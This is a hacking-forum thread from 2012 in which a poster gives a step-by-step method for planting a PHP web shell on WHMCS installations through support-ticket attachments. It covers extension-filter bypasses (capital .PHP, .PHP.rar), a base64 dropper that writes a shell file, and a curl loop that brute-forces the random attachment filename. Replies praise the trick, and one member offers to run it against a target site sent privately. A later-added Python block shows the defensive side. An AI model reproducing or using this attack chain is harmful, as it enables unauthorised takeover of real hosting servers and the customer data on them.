

WHMCS 3rd TricK wIth MiMe TyPe And PHP Ext ByPass


09-30-2012, 11:15 PM #1
b0x Offline b0x *******
Hello Brothers

How are You ?

Today We've 3rd WHMCS Trick - Uploading Shell On WHMCS Via Attachments

At First , Let's Talk About Mime Types

These Are Extensions

Code:
gif,png,rar,zip,php,asp,aspx

Apache Uses Extension To Run File As It Extension

For Example If You Upload File As This : b0x.gif

Apache Will run it As Picture/Image

And If You Do it As This : b0x.php

The File will Be Run as PHP File

Okay ... In Apache There Are Many Extensions That Are Not Defined, Like rar

So Let's Start in WHMCS go to submit new ticket

Code:
http://site.tld/whmcs/submitticket.php

You'll See This

[Image: WOR61514.png]
So Here The Attachments We've Prospect'z

I : The Extension PHP Is allowed To Be Uploaded

But When We Try 2 Upload PHP File We'll Have This result

[Image: AKQ64896.png]

To Bypass This Problem ,, Just You've To Change Extension From Small php To Capital PHP Like This

Code:
b0x.PHP

The Changing In Extension Will Be Via Tamper Data

[Image: oDZ62191.png]

Then Submit it

[Image: wh162273.png]

Our Ticket Is ready Now .. So We Uploaded PHP

This Was Our 1st Prospect

II : PHP Extension Is not Allowed To Be uploaded on WHMCS

So We'll Use Non-Defined Extension in Apache

Like " rar " So We'll Use Tamper Data Too

[Image: tSi62460.png]

We'll Upload As This "b0x.PHP.rar"

Don't Forget Capital Letters

Then We'll Have This

[Image: hlj62514.png]

File Uploaded Successfully

But In WHMCS ,, When You Use Attachment or upload One

The File Will Automatically Renamed To Be Like This

Code:
number_filename.extension

For Example Our File b0x.PHP Will Be Like This

Code:
RandomNumber_b0x.PHP

We'll Not be Able To Know The Numbers Because it Uses Random Number So We've To Try Numbers

Before That .. Let's Make Small Summary

This Code Must be As Attach File

PHP Code:
<?php 
$shellcode 
"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"
$b0x fopen("sec4ever.php","w"); 
fwrite($b0x,base64_decode($shellcode)); 
?>

This is uploader Script Will be Opened In The Same Folder - attachments -
Now Upload it as Before Via .PHP or non-defined

After That ,, Use This Code To Generate / Browse Site And get Uploader in sec4ever.php

PHP Code:
<?  
error_reporting
(0);  
$url "http://domain.tld/whmcs/";  
$attachfolder "attachments";  
$attach"b0x.PHP";  
for(
$b0x=100000$b0x<1000000;$b0x++){  
$urls "$url/$attachfolder/$b0x"$urls.="_$attach";  
$ch = @curl_init();  
@
curl_setopt($chCURLOPT_RETURNTRANSFER1);  
@
curl_setopt($chCURLOPT_URL$urls );  
$result = @curl_exec($ch);  
@
curl_close($ch);  
}  
?>

Edit The Variables To Get The Correct Result - 3xPecteD

Then When The Script Ends Browsing URL'z Via Auto-Generate By For Function

The Script Will Browse Your PHP Code But You'll Not Be Able To Know What is the Number !

But The Script Will Generate Shell/Uploader in Sec4ever.php

[Image: q8O63187.png]

Greet'z
I-Hmx
Sec4ever
MadLeets
Shadow008
1337
H4x0rL1f3
Dr.Zombie
KhantastiC
X-Shadow




Thanks 4 All
./b0x
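
Added example, not part of the original post and not WHMCS code: a Python sketch of the defender's side of the two cases described above (capital .PHP, and .PHP followed by an extension Apache has no mapping for), showing why a case-sensitive last-extension filter passes both names and how to audit an attachments folder that uses the number_filename.extension naming. The extension sets, the naive_check model and the sample listing are assumptions constructed for illustration.

```python
import re

# Assumptions for this sketch: the server's PHP-mapped extensions and the
# attachment allowlist. Adjust both to the real configuration.
PHP_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar"}
ALLOWED_EXTS = {"gif", "png", "jpg", "jpeg", "zip", "txt", "pdf"}

# Stored name format from the post: number_filename.extension
STORED_NAME = re.compile(r"^(\d+)_(.+)$")


def extensions(name):
    """Every dot-separated extension, lower-cased (mod_mime ignores case)."""
    return [part.lower() for part in name.split(".")[1:] if part]


def naive_check(name, blocked=("php",)):
    """Hypothetical flawed filter: case-sensitive, last extension only."""
    return name.rsplit(".", 1)[-1] not in blocked


def strict_check(name):
    """Accept exactly one extension, allowlisted, compared without case."""
    exts = extensions(name)
    return len(exts) == 1 and exts[0] in ALLOWED_EXTS


def audit_attachments(stored_names):
    """Return stored names whose original filename carries a PHP extension."""
    hits = []
    for stored in stored_names:
        match = STORED_NAME.match(stored)
        original = match.group(2) if match else stored
        if any(ext in PHP_EXTS for ext in extensions(original)):
            hits.append(stored)
    return hits


# Constructed listing of an attachments directory (not real data).
SAMPLE_LISTING = [
    "482913_invoice.pdf", "771204_b0x.PHP", "135790_b0x.PHP.rar",
    "246801_logo.png", "998877_notes.txt",
]

if __name__ == "__main__":
    for name in ("b0x.php", "b0x.PHP", "b0x.PHP.rar", "logo.png"):
        print(name, "naive:", naive_check(name), "strict:", strict_check(name))
    print("flagged:", audit_attachments(SAMPLE_LISTING))
```

Storing attachments outside the web root, or disabling the PHP handler for the attachments directory, removes the execution step regardless of which name gets through the filter.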






09-30-2012, 11:19 PM #2
H4x0rl1f3 Offline Commander In Cheif *******
Finally it's out
hahahah UnderTaker u rock

Always Aspect Reward from the Creator and not anyone or anything Created.
For Complaints & Help Contact:- [email protected]
Zone-h
http://zone-h.org/archive/notifier=H4x0rL1f3
I am the orphan of Gaza & Kashmir. Ruins of Iraq,Syria & Palestine Bombarded of Pakistan,Afghanistan, Mali & Yemen Change of Libya and Egypt Discriminated of Bahrain & Turkey Freedom of Earth's paradise and Al-AQSA. I am the hunger stricken child of Somalia, Ethopia, & rest of Africa I am the suffering of each and every single corner of the world. But Listen!!! Hope is what I am!!


09-30-2012, 11:19 PM #3
3thicaln00b Offline MadLeets Vip ******
awesome trick buddy

09-30-2012, 11:21 PM #4
CutY Offline MadLeets Vip ******
wut an idea sir G =)))

RocKxx xD

09-30-2012, 11:52 PM #5
Pain006 Offline Super Moderator ******
Great

10-01-2012, 12:43 AM #6
Dr.Z0mbie Offline Administrator *******
awesome trick, keep up the good work

Y U NO ADD REP?!

10-01-2012, 12:56 AM #7
b13-u Offline Junior Member **
Not Working ...
u can't upload file like this
up.PHP
RandNumber_up.PHP
it is not allowed in whmcs u have to upload like this
up.PHP.gif
RandNumber_up.PHP.gif
the php file will not execute...

10-01-2012, 01:10 AM #8
H4x0rl1f3 Offline Commander In Cheif *******
(10-01-2012, 12:56 AM)b13-u Wrote:  Not Working ...
u can't upload file like this
up.PHP
RandNumber_up.PHP
it is not allowed in whmcs u have to upload like this
up.PHP.gif
RandNumber_up.PHP.gif
the php file will not execute...
lols, if this was not working we wouldn't have posted, not everything here u see is visible to 1,2,3,4,5,6 steps even all his easy you are just unable to do it.
This works 100 percent and we did it also.
Regard's



10-01-2012, 01:15 AM #9
b0x Offline b0x *******
hey mad'z

thx 4 posting
Code:
lols, if this was not working we wouldnt have posted, not everything  here u see is visible to 1,2,3,4,5,6 steps even all his easy you are  just unable to do it.
This works 100 percent and we did it also.
Regard's

We'll Kill him =)))

Mr b13-u

Send Me in Priv8 Message Site To upload Shell
And Check the Version ,, We Executed on the Last one 5.1

10-01-2012, 04:10 AM #10
b13-u Offline Junior Member **
how do u expect this
fwrite($b0x,base64_decode($shellcode));
to work while server is not handling it as php ?
anyway i sent u the target i also tried on many others

thankx





